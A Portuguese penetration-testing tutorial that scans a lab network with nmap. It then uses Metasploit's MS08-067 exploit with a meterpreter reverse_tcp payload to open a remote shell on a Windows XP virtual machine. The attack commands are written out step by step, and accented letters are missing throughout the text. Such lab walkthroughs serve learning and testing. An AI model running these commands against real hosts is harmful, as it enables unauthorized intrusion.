Você está na página 1de 6

Salve! Salve! Aqui vai mais um textinho falando sobre o framework Metasploit.

Irei demonstrar algumas tcnicas simples/bsicas de scanning e fingerprint usando o Metasploit e em seguida exploraremos uma mquina MS para obtermos uma shell. Let`s go??? Comeando! Bom galera, vamos comear! Para que voc possa ter uma boa noo de como o Metasploit realmente funciona, nada melhor que conseguir obter o acesso a uma mquina (Virtual) e assim poder testar e estudar todas suas funcionalidades, ficando cada dia mais "afiado" em seus testes de intruso. Sim, este artigo bem bsico. O cenrio utilizado foi o seguinte:

Neste caso, so 2 mquinas virtuais (VMs) criadas usando o Virtualbox. As placas de rede de ambas VMs, esto configuradas como bridge. 1 VM = Sistema Operacional Backtrack 4 Final com endereo IP 192.168.0.170. 2 VM = Sistema Operacional Windows XP SP2 com endereo IP 192.168.0.186. Quer saber mais sobre virtualbox? Digite "virtualbox" no google que encontrar timos artigos/dicas sobre o mesmo. Scanning com Nmap e Metasploit Ok pessoal, vamos utilizar a ferramenta "nmap" para fazer o scanning em nossa rede interna. Abra um terminal no micro com o backtrack e digite a seguinte sintaxe: # nmap -v -sS --script=smb-check-vulns 192.168.0.0/24 -v = Modo Verbose -sS = TCP Syn Scan --script=smb-check-vulns = Script para verificar vulns conhecidas, como por exemplo, MS08-067, Conficker, regsvc DoS e SMBv2 exploit. 192.168.0.0/24 = Range de IP utilizado em minha rede local.

Se repararem, no host com endereo IP 192.168.0.186, ver que mostrado as portas que esto abertas, e em MS08-067 est como VULNERABLE, tendo essa "simples" base, vamos atac-lo. Certo, descobrimos um host dentro da nossa LAN que est possvelmente vulnervel ao nosso ataque pretendido! Agora vamos carregar o Metasploit. No terminal, basta digitar msfconsole e...

Obtemos nosso console do msf. Dei uma personalizada na sada :-) Feito isto, vamos efetuar a intruso na mquina. Os comando so os seguintes: use exploit/windows/smb/ms08_067_netapi <------ Aqui falamos que queremos usar o exploit ms08_067_netapi set RHOST 192.168.0.186 <------ Aqui setamos o nosso host remoto, que no caso o endereo IP da VM com Windows XP SP2 set PAYLOAD windows/meterpreter/reverse_tcp <------ Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele o responsvel por criar a nossa comunicao entre LHOST e RHOST.

set LHOST 192.168.0.170 <------ Aqui setamos nosso host local, que no caso o endereo IP da VM com Backtrack 4. exploit <------ E finalmente executamos nosso exploit. Observem a imagem abaixo.

Pronto! Ganhamos nossa shell meterpreter, ou seja, j estamos na mquina alvo. Experimente dar os comandos sysinfo e ipconfig.

Ok! Vamos ver outros recursos que podemos utilizar antes de executarmos o exploit. Opes Metasploit Quando executamos o comando exploit, ser realizado um "fingerprint" para a deteco do Sistema Operacional e verificar se o mesmo consta em sua lista de SOs vulnerveis. Como vimos atrves do script do nmap que nosso alvo vulnervel, podemos "ns" realizar o processo de fingerprint e passar as especificaes corretas para o msf, assim nosso exploit no precisar realizar esta etapa, gerando possibilidades menores de erros. Certo, mais como? Poderiamos fazer utilizando o nmap, mais vamos utilizar um mdulo auxiliar presente

no metasploit para descobrir a verso do SO, o idioma, nome da mquina e o domnio. Executaremos os seguintes comandos: use auxiliary/scanner/smb/smb_version <---- Falamos que queremos utilizar o scanner smb_version. set RHOSTS 192.168.0.186 <---- Aqui eu setei um nico host (192.168.0.186), mais poderia especificar um range, exemplo, 192.168.0.0/24. run <---- Comando para executar nosso scanner.

Agora j sabemos a verso certa do SO e o idioma, com isso especificaremos em nosso exploit usando a opo set TARGET. use exploit/windows/smb/ms08_067_netapi <------ Aqui falamos que queremos usar o exploit ms08_067_netapi set RHOST 192.168.0.186 <------ Aqui setamos o nosso host remoto, que no caso o endereo IP da VM com Windows XP SP2 set PAYLOAD windows/meterpreter/reverse_tcp <------ Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele o responsvel por criar a nossa comunicao entre LHOST e RHOST. set LHOST 192.168.0.170 <------ Aqui setamos nosso host local, que no caso o endereo IP da VM com Backtrack 4. set TARGET 31 <------ Aqui eu digo o que o alvo est usando. exploit <------ E finalmente executamos nosso exploit. Na imagem abaixo, listado com o comando show targets, todos os S.O.s vulnerveis a este exploit (ms08_067).

Veja abaixo que irei utilizar a opo 31.

Veja o ataque agora.

Veja que no foi realizado a etapa de fingerprint com o alvo, pois "falamos" para o exploit, o S.O. que ele encontrar em seu destino. Ok! Finish! The end! Heheheh

Ah!

isso galera, intruso simples, sendo recomendado para quem ainda est comeando com o Metasploit. Como continuao, podero seguir o outro artigo que escrevi sobre o Metasploit. Metasploit Exploitation http://codesec.blogspot.com/2010/02/metasploit-exploitation.html Abraos a todos!

Roberto Soares (3spreto) codesec.blogspot.com WWW.backtrack.com.br robertoespreto@gmail.com espreto@backtrack.com.br